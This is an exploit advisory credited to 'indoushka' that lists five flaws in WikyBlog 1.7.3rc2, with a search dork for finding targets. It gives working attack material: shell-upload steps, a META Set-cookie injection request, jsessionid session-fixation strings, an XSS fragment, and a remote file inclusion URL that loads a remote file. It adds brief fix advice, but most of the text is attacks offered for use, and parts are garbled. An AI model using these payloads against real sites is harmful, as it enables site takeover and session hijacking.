WikyBlog 1.7.3rc2 multiple vulnerabalities

2010-02-25 / 2010-02-26
Credit: indoushka
Risk: High
Local: No
Remote: Yes

======================================================================================== | # Title : WikyBlog-1.7.3rc2 Mullti Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.iq-ty.com | # Web Site : http://www.wikyblog.com/ | # Dork : Powered by WikyBlog | # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | # Bug : XSS ====================== Exploit By indoushka ================================= # Exploit : 1- Upload Shell: first Register in to web site name)?cmd=uploadform (use temper data) secend go to name )/uploaded/ 2 find you Ev!l 2- Cookie manipulation: Vulnerability description: This script is vulnerable to Cookie manipulation attacks. By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site. This vulnerability affects /Wiky/index.php/Special/Main/Templates. The impact of this vulnerability By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards. Attack details : The GET variable which has been set to <meta+http-equiv='Set-cookie'+content='userCmd=edit'>. GET /Wiky/index.php/Special/Main/Templates?cmd=copy&which=<meta+http-equiv='Set-cookie'+content='userCmd=edit'> How to fix this vulnerability: You need to filter the output in order to prevent the injection of custom HTTP headers or META tags. Additionally, with each login the application should provide a new session ID to the user. 3- Cross Site Scripting:<img+src=> 4- jsessionid session fixation: Vulnerability description: This script is vulnerable to jsessionid session fixation attacks. By injecting a custom jsessionid is possible to alter the session cookie. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site. This vulnerability affects /Wiky/index.php/Main. The impact of this vulnerability By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards. Attack details:;jsessionid=indoushkasessionfixation;jsessionid=indoushkasessionfixation;jsessionid=indoushkasessionfixation 5- RFI: http://localhost/Wiky/include/WBmap.php?langFile=http://localhost/c.txt?



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